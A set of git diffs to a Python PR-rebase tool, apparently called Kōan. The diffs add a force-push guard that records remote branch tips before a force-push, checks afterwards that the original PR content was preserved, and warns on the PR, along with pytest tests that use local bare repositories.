-        )
         return ""
     actions_log.append(
         "Force-push guard: original PR content was dropped, modified, or "
@@ -2385,6 +2394,42 @@ def _run_force_push_guard(
         print(
             f"[rebase_pr] force-push guard alert delivery failed: {e}",
             file=sys.stderr,
+        )
+    return section
+
+
+def _build_push_guard_section(
+    *,
+    pre_rebase_head: str,
+    target_ref: str,
+    project_path: str,
+    push_state: dict,
+    branch: str,
+    actions_log: List[str],
+) -> str:
+    """Run the check and render it; "" when there is nothing to report."""
+    findings = force_push_guard.verify_content_preserved(
+        pre_rebase_head,
+        target_ref,
+        project_path,
+        pre_push_remote_heads=push_state.get("observations", []),
+        push_remote=push_state.get("remote", ""),
+        branch=branch,
+        pushed_head=push_state.get("pushed_head", ""),
+        observation_failed=bool(push_state.get("observation_failed")),
+    )
+    if findings is None:
+        actions_log.append(
+            "Force-push guard skipped: no confirmed pushed SHA, or the content "
+            "check could not run (non-fatal)"
+        )
+        return ""
+    section = force_push_guard.build_push_warning(
+        findings, branch, remote=push_state.get("remote") or "origin",
+    )
+    if not section:
+        actions_log.append(
+            "Force-push guard: all original PR content verified preserved"
         )
     return section
 
@@ -2467,6 +2512,51 @@ def _checkout_pr_branch(
     return fetch_remote
 
 
+def _push_to_remote(branch: str, project_path: str, remote: str) -> dict:
+    """Force-push *branch* to one remote, collecting the guard's telemetry.
+
+    Returns the observations belonging to **this** attempt only — a tip seen
+    on a remote whose push then fails was never overwritten, and reporting it
+    as clobbered would send the human chasing commits that are still there.
+    Raises whatever the push raises.
+    """
+    observations: List[str] = []
+    failures: List[str] = []
+
+    def observe() -> None:
+        """Snapshot the remote tip (and fetch its objects) before overwriting it.
+
+        Feeds the content-preservation guard so commits pushed by others
+        mid-rebase can be detected and named after this push erases them.
+        """
+        sha = force_push_guard.observe_remote_head(remote, branch, project_path)
+        if sha is None:
+            failures.append(remote)  # could not look — not "nothing there"
+        elif sha and sha not in observations:
+            observations.append(sha)
+
+    observe()
+    # The SHA we are about to publish. Captured before the push and only
+    # reported on success, so a commit that never reached the remote can
+    # neither skew the guard's comparison nor fake a post-push race.
+    head_to_push = ""
+    try:
+        head_to_push = _run_git(
+            ["git", "rev-parse", "HEAD"], cwd=project_path, timeout=30,
+        ).strip()
+    except Exception as e:
+        print(f"[rebase_pr] pushed-head capture failed: {e}", file=sys.stderr)
+    # A rejected --force-with-lease means the remote moved since the
+    # observation above; re-observe before the plain --force clobbers it.
+    _force_push(remote, branch, project_path, on_lease_failure=observe)
+    return {
+        "remote": remote,
+        "pre_push_remote_heads": observations,
+        "observation_failed": bool(failures),
+        "pushed_head": head_to_push,
+    }
+
+
 def _push_with_fallback(
     branch: str,
     base: str,
@@ -2486,49 +2576,16 @@ def _push_with_fallback(
     actions: List[str] = []
     remotes = _ordered_remotes(head_remote, cwd=project_path)
     last_error = ""
-    observations: List[str] = []
-
-    def observe(remote: str) -> None:
-        """Snapshot the remote tip (and fetch its objects) before overwriting it.
-
-        Feeds the content-preservation guard so commits pushed by others
-        mid-rebase can be detected and named after this push erases them.
-        """
-        sha = force_push_guard.observe_remote_head(remote, branch, project_path)
-        if sha and sha not in observations:
-            observations.append(sha)
 
     for remote in remotes:
-        observe(remote)
-        # The SHA we are about to publish. Captured before the push and only
-        # reported on success, so a commit that never reached the remote can
-        # neither skew the guard's comparison nor fake a post-push race.
-        head_to_push = ""
         try:
-            head_to_push = _run_git(
-                ["git", "rev-parse", "HEAD"], cwd=project_path, timeout=30,
-            ).strip()
-        except Exception as e:
-            print(f"[rebase_pr] pushed-head capture failed: {e}", file=sys.stderr)
-        try:
-            # A rejected --force-with-lease means the remote moved since the
-            # observation above; re-observe before the plain --force clobbers it.
-            _force_push(
-                remote, branch, project_path,
-                on_lease_failure=lambda r=remote: observe(r),
-            )
-            actions.append(f"Force-pushed `{branch}` to {remote}")
-            return {
-                "success": True,
-                "actions": actions,
-                "error": "",
-                "remote": remote,
-                "pre_push_remote_heads": list(observations),
-                "pushed_head": head_to_push,
-            }
+            pushed = _push_to_remote(branch, project_path, remote)
         except Exception as e:
             print(f"[rebase_pr] push to {remote} failed: {e}", file=sys.stderr)
             last_error = str(e)
+            continue
+        actions.append(f"Force-pushed `{branch}` to {remote}")
+        return {"success": True, "actions": actions, "error": "", **pushed}
 
     return {
         "success": False,

--- a/koan/app/rebase_pr.py
+++ b/koan/app/rebase_pr.py
@@ -43,6 +43,7 @@ from app.claude_step import (
     run_claude_step,
     wait_for_ci,
 )
+from app import force_push_guard
 from app.github_alerts import build_alert
 from app.config import (
     get_rebase_include_bot_feedback,
@@ -859,6 +860,19 @@ def _run_rebase_impl(
     except Exception as e:
         return False, f"Failed to checkout branch `{branch}`: {e}"
 
+    # The PR head everything downstream is based on — the reference point for
+    # the post-push content-preservation check (force_push_guard).
+    pre_rebase_head = ""
+    try:
+        pre_rebase_head = _run_git(
+            ["git", "rev-parse", "HEAD"], cwd=project_path, timeout=30,
+        ).strip()
+    except Exception as e:
+        print(
+            f"[rebase_pr] could not capture pre-rebase head: {e}",
+            file=sys.stderr,
+        )
+
     # Use API-discovered head_remote, fall back to checkout's fetch_remote
     effective_head_remote = head_remote or fetch_remote
 
@@ -1070,6 +1084,22 @@ def _run_rebase_impl(
     if gate_action:
         actions_log.append(gate_action)
 
+    # ── Step 7.5: Force-push content-preservation check ────────────────
+    # Runs after the pipeline's last push (gate fixes included) while the PR
+    # branch is still checked out. Detects dropped/modified original content,
+    # clobbered concurrent pushes, and a post-push remote race. Best-effort:
+    # never blocks or reverts — it warns loudly on the PR instead.
+    push_guard_section = _run_force_push_guard(
+        pre_rebase_head=pre_rebase_head,
+        target_ref=f"{rebase_remote}/{base}",
+        project_path=project_path,
+        push_result=push_result,
+        branch=branch,
+        pr_number=pr_number,
+        actions_log=actions_log,
+        notify_fn=notify_fn,
+    )
+
     # ── Step 8: Collect final diffstat ─────────────────────────────────
     diffstat = _get_diffstat(f"{rebase_remote}/{base}", project_path)
 
@@ -1093,6 +1123,7 @@ def _run_rebase_impl(
         feedback_failed=feedback_status in ("feedback_timeout", "feedback_failed"),
         feedback_reason=feedback_reason,
         show_transition_notice=show_transition_notice,
+        push_guard_section=push_guard_section,
     )
 
     try:
@@ -2263,6 +2294,58 @@ def _build_rebase_recovery_guidance(project_path: str) -> str:
 
 
 
+def _run_force_push_guard(
+    *,
+    pre_rebase_head: str,
+    target_ref: str,
+    project_path: str,
+    push_result: dict,
+    branch: str,
+    pr_number: str,
+    actions_log: List[str],
+    notify_fn,
+) -> str:
+    """Post-push content-preservation check; returns the PR-comment alert.
+
+    Best-effort by contract (specs/components/git-github.md): a guard that
+    cannot run logs the fact and returns "" — it never fails the rebase.
+    """
+    if not pre_rebase_head:
+        actions_log.append(
+            "Force-push guard skipped: pre-rebase head was not captured"
+        )
+        return ""
+    findings = force_push_guard.verify_content_preserved(
+        pre_rebase_head,
+        target_ref,
+        project_path,
+        pre_push_remote_head=push_result.get("pre_push_remote_head", ""),
+        push_remote=push_result.get("remote", ""),
+        branch=branch,
+    )
+    if findings is None:
+        actions_log.append(
+            "Force-push guard skipped: content check could not run (non-fatal)"
+        )
+        return ""
+    section = force_push_guard.build_push_warning(findings, branch)
+    if not section:
+        actions_log.append(
+            "Force-push guard: all original PR content verified preserved"
+        )
+        return ""
+    actions_log.append(
+        "Force-push guard: original PR content was dropped, modified, or "
+        "raced — see the warning at the top of this comment"
+    )
+    with contextlib.suppress(Exception):
+        notify_fn(
+            f"⚠️ Force-push guard: PR #{pr_number} (`{branch}`) — the rewrite "
+            f"needs attention; details in the PR comment."
+        )
+    return section
+
+
 def _checkout_pr_branch(
     branch: str,
     project_path: str,
@@ -2361,10 +2444,22 @@ def _push_with_fallback(
     remotes = _ordered_remotes(head_remote, cwd=project_path)
     last_error = ""
     for remote in remotes:
+        # Snapshot the remote tip (and fetch its objects) right before the
+        # force-push so the content-preservation guard can detect and name
+        # commits pushed by others mid-rebase that this push overwrites.
+        observed_head = force_push_guard.observe_remote_head(
+            remote, branch, project_path,
+        )
         try:
             _force_push(remote, branch, project_path)
             actions.append(f"Force-pushed `{branch}` to {remote}")
-            return {"success": True, "actions": actions, "error": ""}
+            return {
+                "success": True,
+                "actions": actions,
+                "error": "",
+                "remote": remote,
+                "pre_push_remote_head": observed_head,
+            }
         except Exception as e:
             print(f"[rebase_pr] push to {remote} failed: {e}", file=sys.stderr)
             last_error = str(e)
@@ -2429,6 +2524,7 @@ def _build_rebase_comment(
     feedback_failed: bool = False,
     feedback_reason: str = "",
     show_transition_notice: bool = False,
+    push_guard_section: str = "",
 ) -> str:
     """Build a structured markdown comment summarizing the rebase.
 
@@ -2500,6 +2596,11 @@ def _build_rebase_comment(
 
     parts = [f"## {rebase_type}\n"]
     parts.append(f"{summary_line}\n")
+
+    # Force-push content-preservation warning first — when present it is the
+    # single most important thing on the comment (specs/skills/rebase.md).
+    if push_guard_section:
+        parts.append(push_guard_section + "\n")
 
     # Transient notice announcing the /rebase default change (bare rebase no
     # longer applies review feedback). Only on the bare-rebase path, and only

--- a/koan/app/rebase_pr.py
+++ b/koan/app/rebase_pr.py
@@ -2528,8 +2528,23 @@ def _push_to_remote(branch: str, project_path: str, remote: str) -> dict:
 
         Feeds the content-preservation guard so commits pushed by others
         mid-rebase can be detected and named after this push erases them.
+
+        Never raises: this runs on the live push path (before the push, and
+        again from the lease-failure hook), and the guard detects and warns —
+        it must not gate the force-push. Anything unexpected is logged and
+        recorded as a failed observation, so the guard reports the clobber
+        check as unverified instead of the push not happening at all.
         """
-        sha = force_push_guard.observe_remote_head(remote, branch, project_path)
+        try:
+            sha = force_push_guard.observe_remote_head(
+                remote, branch, project_path,
+            )
+        except Exception as e:
+            print(
+                f"[rebase_pr] pre-push observation of {remote} failed: {e}",
+                file=sys.stderr,
+            )
+            sha = None
         if sha is None:
             failures.append(remote)  # could not look — not "nothing there"
         elif sha and sha not in observations:

--- a/koan/app/rebase_pr.py
+++ b/koan/app/rebase_pr.py
@@ -1071,9 +1071,7 @@ def _run_rebase_impl(
     push_state = {
         "remote": push_result.get("remote", ""),
         "pushed_head": push_result.get("pushed_head", ""),
-        "observations": [
-            h for h in [push_result.get("pre_push_remote_head", "")] if h
-        ],
+        "observations": [h for h in push_result.get("pre_push_remote_heads", []) if h],
     }
 
     # ── Step 7: Private review gate ────────────────────────────────────
@@ -1208,12 +1206,14 @@ def _run_rebase_private_review_gate(
         if push_state is not None:
             if push_result.get("remote"):
                 push_state["remote"] = push_result["remote"]
-            if push_result.get("pushed_head"):
-                push_state["pushed_head"] = push_result["pushed_head"]
-            if push_result.get("pre_push_remote_head"):
-                push_state.setdefault("observations", []).append(
-                    push_result["pre_push_remote_head"]
-                )
+            # Always overwrite, including with "": once the gate has pushed,
+            # the step-6 SHA is stale and comparing against it would fake a
+            # race. No confirmed SHA means the guard skips, which is correct.
+            push_state["pushed_head"] = push_result.get("pushed_head", "")
+            observations = push_state.setdefault("observations", [])
+            for observed in push_result.get("pre_push_remote_heads", []):
+                if observed and observed not in observations:
+                    observations.append(observed)
 
     try:
         from app.private_review_gate import run_private_review_gate
@@ -2353,7 +2353,8 @@ def _run_force_push_guard(
     )
     if findings is None:
         actions_log.append(
-            "Force-push guard skipped: content check could not run (non-fatal)"
+            "Force-push guard skipped: no confirmed pushed SHA, or the content "
+            "check could not run (non-fatal)"
         )
         return ""
     section = force_push_guard.build_push_warning(
@@ -2368,10 +2369,22 @@ def _run_force_push_guard(
         "Force-push guard: original PR content was dropped, modified, or "
         "raced — see the warning at the top of this comment"
     )
-    with contextlib.suppress(Exception):
-        notify_fn(
+    # A safety finding is an outcome, not progress: notify_outcome() delivers it
+    # through the un-gated sink so it reaches the human in normal mode too, and a
+    # delivery failure is logged rather than swallowed (the PR comment still
+    # carries the full detail either way).
+    try:
+        from app.messaging_level import notify_outcome
+
+        notify_outcome(
             f"⚠️ Force-push guard: PR #{pr_number} (`{branch}`) — the rewrite "
-            f"needs attention; details in the PR comment."
+            f"needs attention; details in the PR comment.",
+            notify_fn,
+        )
+    except Exception as e:
+        print(
+            f"[rebase_pr] force-push guard alert delivery failed: {e}",
+            file=sys.stderr,
         )
     return section
 
@@ -2473,32 +2486,45 @@ def _push_with_fallback(
     actions: List[str] = []
     remotes = _ordered_remotes(head_remote, cwd=project_path)
     last_error = ""
+    observations: List[str] = []
+
+    def observe(remote: str) -> None:
+        """Snapshot the remote tip (and fetch its objects) before overwriting it.
+
+        Feeds the content-preservation guard so commits pushed by others
+        mid-rebase can be detected and named after this push erases them.
+        """
+        sha = force_push_guard.observe_remote_head(remote, branch, project_path)
+        if sha and sha not in observations:
+            observations.append(sha)
+
     for remote in remotes:
-        # Snapshot the remote tip (and fetch its objects) right before the
-        # force-push so the content-preservation guard can detect and name
-        # commits pushed by others mid-rebase that this push overwrites.
-        observed_head = force_push_guard.observe_remote_head(
-            remote, branch, project_path,
-        )
+        observe(remote)
+        # The SHA we are about to publish. Captured before the push and only
+        # reported on success, so a commit that never reached the remote can
+        # neither skew the guard's comparison nor fake a post-push race.
+        head_to_push = ""
         try:
-            _force_push(remote, branch, project_path)
+            head_to_push = _run_git(
+                ["git", "rev-parse", "HEAD"], cwd=project_path, timeout=30,
+            ).strip()
+        except Exception as e:
+            print(f"[rebase_pr] pushed-head capture failed: {e}", file=sys.stderr)
+        try:
+            # A rejected --force-with-lease means the remote moved since the
+            # observation above; re-observe before the plain --force clobbers it.
+            _force_push(
+                remote, branch, project_path,
+                on_lease_failure=lambda r=remote: observe(r),
+            )
             actions.append(f"Force-pushed `{branch}` to {remote}")
-            # Record what was actually pushed: the guard compares against this
-            # SHA (not local HEAD) so a later unpushed commit can't fake a race.
-            pushed_head = ""
-            try:
-                pushed_head = _run_git(
-                    ["git", "rev-parse", "HEAD"], cwd=project_path, timeout=30,
-                ).strip()
-            except Exception as e:
-                print(f"[rebase_pr] pushed-head capture failed: {e}", file=sys.stderr)
             return {
                 "success": True,
                 "actions": actions,
                 "error": "",
                 "remote": remote,
-                "pre_push_remote_head": observed_head,
-                "pushed_head": pushed_head,
+                "pre_push_remote_heads": list(observations),
+                "pushed_head": head_to_push,
             }
         except Exception as e:
             print(f"[rebase_pr] push to {remote} failed: {e}", file=sys.stderr)

--- a/koan/app/rebase_pr.py
+++ b/koan/app/rebase_pr.py
@@ -1065,6 +1065,17 @@ def _run_rebase_impl(
             "\n".join(f"- {a}" for a in actions_log)
         )
 
+    # Push observations for the content-preservation guard. The private gate
+    # may push again; its push_gate_fix updates this state with its own fresh
+    # pre-push observation and pushed SHA so no pipeline push is a blind spot.
+    push_state = {
+        "remote": push_result.get("remote", ""),
+        "pushed_head": push_result.get("pushed_head", ""),
+        "observations": [
+            h for h in [push_result.get("pre_push_remote_head", "")] if h
+        ],
+    }
+
     # ── Step 7: Private review gate ────────────────────────────────────
     gate_result = _run_rebase_private_review_gate(
         owner=owner,
@@ -1079,6 +1090,7 @@ def _run_rebase_impl(
         notify_fn=notify_fn,
         skill_dir=skill_dir,
         actions_log=actions_log,
+        push_state=push_state,
     )
     gate_action = _format_rebase_private_gate_action(gate_result)
     if gate_action:
@@ -1093,7 +1105,7 @@ def _run_rebase_impl(
         pre_rebase_head=pre_rebase_head,
         target_ref=f"{rebase_remote}/{base}",
         project_path=project_path,
-        push_result=push_result,
+        push_state=push_state,
         branch=branch,
         pr_number=pr_number,
         actions_log=actions_log,
@@ -1160,6 +1172,7 @@ def _run_rebase_private_review_gate(
     notify_fn,
     skill_dir: Optional[Path],
     actions_log: List[str],
+    push_state: Optional[dict] = None,
 ):
     """Run the shared private review gate using /rebase push semantics."""
     if not Path(project_path).is_dir():
@@ -1190,6 +1203,17 @@ def _run_rebase_private_review_gate(
         actions_log.extend(push_result.get("actions", []))
         if not push_result.get("success"):
             raise RuntimeError(push_result.get("error", "unknown push failure"))
+        # Feed the guard: this push's fresh observation and pushed SHA, so a
+        # human push landing between the main push and this one is detected.
+        if push_state is not None:
+            if push_result.get("remote"):
+                push_state["remote"] = push_result["remote"]
+            if push_result.get("pushed_head"):
+                push_state["pushed_head"] = push_result["pushed_head"]
+            if push_result.get("pre_push_remote_head"):
+                push_state.setdefault("observations", []).append(
+                    push_result["pre_push_remote_head"]
+                )
 
     try:
         from app.private_review_gate import run_private_review_gate
@@ -2299,7 +2323,7 @@ def _run_force_push_guard(
     pre_rebase_head: str,
     target_ref: str,
     project_path: str,
-    push_result: dict,
+    push_state: dict,
     branch: str,
     pr_number: str,
     actions_log: List[str],
@@ -2307,8 +2331,11 @@ def _run_force_push_guard(
 ) -> str:
     """Post-push content-preservation check; returns the PR-comment alert.
 
-    Best-effort by contract (specs/components/git-github.md): a guard that
-    cannot run logs the fact and returns "" — it never fails the rebase.
+    *push_state* carries the accumulated push telemetry: the remote actually
+    pushed to, the last successfully pushed SHA, and every pre-push remote
+    observation (main push + gate re-pushes). Best-effort by contract
+    (specs/components/git-github.md): a guard that cannot run logs the fact
+    and returns "" — it never fails the rebase.
     """
     if not pre_rebase_head:
         actions_log.append(
@@ -2319,16 +2346,19 @@ def _run_force_push_guard(
         pre_rebase_head,
         target_ref,
         project_path,
-        pre_push_remote_head=push_result.get("pre_push_remote_head", ""),
-        push_remote=push_result.get("remote", ""),
+        pre_push_remote_heads=push_state.get("observations", []),
+        push_remote=push_state.get("remote", ""),
         branch=branch,
+        pushed_head=push_state.get("pushed_head", ""),
     )
     if findings is None:
         actions_log.append(
             "Force-push guard skipped: content check could not run (non-fatal)"
         )
         return ""
-    section = force_push_guard.build_push_warning(findings, branch)
+    section = force_push_guard.build_push_warning(
+        findings, branch, remote=push_state.get("remote") or "origin",
+    )
     if not section:
         actions_log.append(
             "Force-push guard: all original PR content verified preserved"
@@ -2453,12 +2483,22 @@ def _push_with_fallback(
         try:
             _force_push(remote, branch, project_path)
             actions.append(f"Force-pushed `{branch}` to {remote}")
+            # Record what was actually pushed: the guard compares against this
+            # SHA (not local HEAD) so a later unpushed commit can't fake a race.
+            pushed_head = ""
+            try:
+                pushed_head = _run_git(
+                    ["git", "rev-parse", "HEAD"], cwd=project_path, timeout=30,
+                ).strip()
+            except Exception as e:
+                print(f"[rebase_pr] pushed-head capture failed: {e}", file=sys.stderr)
             return {
                 "success": True,
                 "actions": actions,
                 "error": "",
                 "remote": remote,
                 "pre_push_remote_head": observed_head,
+                "pushed_head": pushed_head,
             }
         except Exception as e:
             print(f"[rebase_pr] push to {remote} failed: {e}", file=sys.stderr)

--- a/koan/tests/test_force_push_guard.py
+++ b/koan/tests/test_force_push_guard.py
@@ -478,6 +478,42 @@ class TestVerifyContentPreserved:
         assert findings is not None
         assert findings.clobbered_commits == []
 
+    def test_failed_observation_is_reported_as_unverified(self, pr_setup):
+        """A clobber check that never ran must not read as 'nothing clobbered'."""
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[],
+            push_remote="origin", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
+            observation_failed=True,
+        )
+        assert findings.has_findings and not findings.is_critical
+        assert any("before the push" in c for c in findings.unverified_checks)
+
+        warning = build_push_warning(findings, "feature")
+        assert warning.startswith("> [!WARNING]")
+        assert "not** confirmed clean" in warning
+
+    def test_failed_race_check_is_reported_as_unverified(self, pr_setup):
+        """A post-push ls-remote outage must not render as 'no race'."""
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_heads=[pr_setup.pre_rebase_head],
+            push_remote="unreachable-remote", branch="feature",
+            pushed_head=_git_out(work, "rev-parse", "HEAD"),
+        )
+        assert findings.has_findings and not findings.is_critical
+        assert findings.remote_head_now == ""
+        assert any("after the push" in c for c in findings.unverified_checks)
+
     def test_unconfirmed_pushed_sha_skips_the_guard(self, pr_setup):
         """Without a confirmed pushed SHA there is nothing trustworthy to
         compare against — local HEAD may hold commits that never reached the
@@ -501,8 +537,10 @@ class TestObserveRemoteHead:
         sha = observe_remote_head("origin", "feature", str(pr_setup.work))
         assert sha == pr_setup.pre_rebase_head
 
-    def test_unreachable_remote_returns_empty(self, pr_setup):
-        assert observe_remote_head("nope", "feature", str(pr_setup.work)) == ""
+    def test_unreachable_remote_reports_the_failure(self, pr_setup):
+        """None, not "" — "could not look" must stay distinguishable from
+        "nothing was there", so the guard can flag the check as unverified."""
+        assert observe_remote_head("nope", "feature", str(pr_setup.work)) is None
 
     def test_missing_branch_returns_empty(self, pr_setup):
         assert observe_remote_head("origin", "ghost", str(pr_setup.work)) == ""
@@ -549,12 +587,13 @@ class TestBuildPushWarning:
             dropped_files=["x.txt"],
             clobbered_commits=["9990000 human push"],
             remote_head_now="c" * 40,
+            unverified_checks=["the remote tip before the push"],
         )
         warning = build_push_warning(findings, "feature")
         assert warning.count("[!") == 1  # parsimony: exactly one alert block
         assert warning.startswith("> [!CAUTION]")
         for token in ("lost work", "reshaped work", "x.txt", "human push",
-                      "c" * 12, "a" * 40):
+                      "c" * 12, "a" * 40, "the remote tip before the push"):
             assert token in warning
 
     def test_long_lists_are_truncated(self):

--- a/koan/tests/test_force_push_guard.py
+++ b/koan/tests/test_force_push_guard.py
@@ -1,0 +1,281 @@
+"""Tests for force_push_guard.py — post-force-push content-preservation checks."""
+
+import subprocess
+from types import SimpleNamespace
+
+import pytest
+
+from app.force_push_guard import (
+    PushGuardFindings,
+    _classify_missing_commits,
+    build_push_warning,
+    observe_remote_head,
+    verify_content_preserved,
+)
+
+
+def _git(cwd, *args):
+    """Run git in *cwd*, raising on failure."""
+    subprocess.run(
+        ["git", "-c", "user.email=t@t", "-c", "user.name=t",
+         "-c", "commit.gpgsign=false", *args],
+        cwd=cwd, check=True, capture_output=True, text=True,
+    )
+
+
+def _git_out(cwd, *args) -> str:
+    return subprocess.run(
+        ["git", *args], cwd=cwd, check=True, capture_output=True, text=True,
+    ).stdout.strip()
+
+
+def _commit_file(repo, name, content, message):
+    (repo / name).write_text(content)
+    _git(repo, "add", name)
+    _git(repo, "commit", "-m", message)
+
+
+@pytest.fixture
+def pr_setup(tmp_path):
+    """A bare remote, a seed clone, and a work clone holding a PR branch.
+
+    Topology at fixture exit (all pushed to the bare remote):
+
+        main:    c1 ── c2            (base advanced after the fork)
+        feature: c1 ── f1 ── f2      (the PR, work clone checked out here)
+    """
+    bare = tmp_path / "remote.git"
+    bare.mkdir()
+    _git(bare, "init", "--bare", "-b", "main", ".")
+
+    seed = tmp_path / "seed"
+    _git(tmp_path, "clone", str(bare), "seed")
+    _git(seed, "config", "user.email", "t@t")
+    _git(seed, "config", "user.name", "t")
+    _commit_file(seed, "a.txt", "one", "c1")
+    _git(seed, "push", "origin", "main")
+    _git(seed, "checkout", "-b", "feature")
+    _commit_file(seed, "f1.txt", "f1", "feature 1")
+    _commit_file(seed, "f2.txt", "f2", "feature 2")
+    _git(seed, "push", "origin", "feature")
+    _git(seed, "checkout", "main")
+    _commit_file(seed, "b.txt", "two", "c2")
+    _git(seed, "push", "origin", "main")
+
+    work = tmp_path / "work"
+    _git(tmp_path, "clone", str(bare), "work")
+    _git(work, "config", "user.email", "t@t")
+    _git(work, "config", "user.name", "t")
+    _git(work, "checkout", "feature")
+    pre_rebase_head = _git_out(work, "rev-parse", "HEAD")
+    return SimpleNamespace(
+        bare=bare, seed=seed, work=work, pre_rebase_head=pre_rebase_head,
+    )
+
+
+class TestVerifyContentPreserved:
+    def test_clean_rebase_has_no_findings(self, pr_setup):
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_head=pr_setup.pre_rebase_head,
+            push_remote="origin", branch="feature",
+        )
+        assert findings is not None
+        assert not findings.has_findings
+        assert build_push_warning(findings, "feature") == ""
+
+    def test_dropped_commit_and_file_detected(self, pr_setup):
+        """A rebase that silently loses a commit is flagged as CAUTION."""
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "reset", "--hard", "HEAD~1")  # lose "feature 2"
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_head=pr_setup.pre_rebase_head,
+            push_remote="origin", branch="feature",
+        )
+        assert findings.has_findings and findings.is_critical
+        assert any("feature 2" in c for c in findings.dropped_commits)
+        assert findings.dropped_files == ["f2.txt"]
+        assert findings.modified_commits == []
+
+        warning = build_push_warning(findings, "feature")
+        assert warning.startswith("> [!CAUTION]")
+        assert "feature 2" in warning
+        assert "f2.txt" in warning
+        assert pr_setup.pre_rebase_head in warning  # recovery SHA
+
+    def test_modified_commit_detected_as_warning(self, pr_setup):
+        """A commit whose patch changed in-flight is flagged, amber tier."""
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        (work / "f2.txt").write_text("f2-changed")
+        _git(work, "add", "f2.txt")
+        _git(work, "commit", "--amend", "--no-edit")
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_head=pr_setup.pre_rebase_head,
+            push_remote="origin", branch="feature",
+        )
+        assert findings.has_findings and not findings.is_critical
+        assert any("feature 2" in c for c in findings.modified_commits)
+        assert findings.dropped_commits == []
+        assert findings.dropped_files == []
+
+        warning = build_push_warning(findings, "feature")
+        assert warning.startswith("> [!WARNING]")
+        assert "verify" in warning
+
+    def test_clobbered_concurrent_push_detected(self, pr_setup):
+        """A human push that lands mid-rebase and gets force-pushed over."""
+        work, seed = pr_setup.work, pr_setup.seed
+
+        # A human pushes to the PR branch while the rebase is running
+        _git(seed, "checkout", "feature")
+        _commit_file(seed, "hotfix.txt", "urgent", "human hotfix")
+        _git(seed, "push", "origin", "feature")
+
+        _git(work, "rebase", "origin/main")
+        observed = observe_remote_head("origin", "feature", str(work))
+        assert observed == _git_out(seed, "rev-parse", "HEAD")
+        # The observation fetched the objects, so the commit is known locally
+        _git(work, "cat-file", "-e", observed)
+
+        _git(work, "push", "origin", "feature", "--force")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_head=observed,
+            push_remote="origin", branch="feature",
+        )
+        assert findings.is_critical
+        assert any("human hotfix" in c for c in findings.clobbered_commits)
+
+        warning = build_push_warning(findings, "feature")
+        assert warning.startswith("> [!CAUTION]")
+        assert "human hotfix" in warning
+
+    def test_post_push_race_detected(self, pr_setup):
+        """Someone force-pushes right after Kōan — the final check sees it."""
+        work, seed = pr_setup.work, pr_setup.seed
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+
+        # Immediately afterwards the branch moves again
+        _git(seed, "push", "origin", "main:feature", "--force")
+        racer_sha = _git_out(seed, "rev-parse", "main")
+
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_head=pr_setup.pre_rebase_head,
+            push_remote="origin", branch="feature",
+        )
+        assert findings.has_findings and not findings.is_critical
+        assert findings.remote_head_now == racer_sha
+
+        warning = build_push_warning(findings, "feature")
+        assert warning.startswith("> [!WARNING]")
+        assert racer_sha[:12] in warning
+
+    def test_guard_degrades_to_none_on_bad_input(self, pr_setup):
+        """An unusable baseline SHA must not raise — the guard steps aside."""
+        findings = verify_content_preserved(
+            "0" * 40, "origin/main", str(pr_setup.work),
+        )
+        assert findings is None
+
+    def test_missing_pre_push_observation_skips_clobber_check(self, pr_setup):
+        work = pr_setup.work
+        _git(work, "rebase", "origin/main")
+        _git(work, "push", "origin", "feature", "--force")
+        findings = verify_content_preserved(
+            pr_setup.pre_rebase_head, "origin/main", str(work),
+            pre_push_remote_head="",  # observation failed
+            push_remote="origin", branch="feature",
+        )
+        assert findings is not None
+        assert findings.clobbered_commits == []
+
+
+class TestObserveRemoteHead:
+    def test_returns_remote_tip(self, pr_setup):
+        sha = observe_remote_head("origin", "feature", str(pr_setup.work))
+        assert sha == pr_setup.pre_rebase_head
+
+    def test_unreachable_remote_returns_empty(self, pr_setup):
+        assert observe_remote_head("nope", "feature", str(pr_setup.work)) == ""
+
+    def test_missing_branch_returns_empty(self, pr_setup):
+        assert observe_remote_head("origin", "ghost", str(pr_setup.work)) == ""
+
+
+class TestClassifyMissingCommits:
+    def test_empty_commit_is_not_flagged(self, pr_setup):
+        """Rebase legitimately drops empty commits — never report them lost."""
+        work = pr_setup.work
+        _git(work, "commit", "--allow-empty", "-m", "empty marker")
+        empty_sha = _git_out(work, "rev-parse", "HEAD")
+        dropped, modified, touched = _classify_missing_commits(
+            str(work), [empty_sha], set(),
+        )
+        assert dropped == [] and modified == [] and touched == set()
+
+
+class TestBuildPushWarning:
+    def test_none_findings_render_empty(self):
+        assert build_push_warning(None, "feature") == ""
+
+    def test_clean_findings_render_empty(self):
+        assert build_push_warning(PushGuardFindings(), "feature") == ""
+
+    def test_single_alert_even_with_every_finding_type(self):
+        findings = PushGuardFindings(
+            pre_rebase_head="a" * 40,
+            pushed_head="b" * 40,
+            dropped_commits=["abc1234 lost work"],
+            modified_commits=["def5678 reshaped work"],
+            dropped_files=["x.txt"],
+            clobbered_commits=["9990000 human push"],
+            remote_head_now="c" * 40,
+        )
+        warning = build_push_warning(findings, "feature")
+        assert warning.count("[!") == 1  # parsimony: exactly one alert block
+        assert warning.startswith("> [!CAUTION]")
+        for token in ("lost work", "reshaped work", "x.txt", "human push",
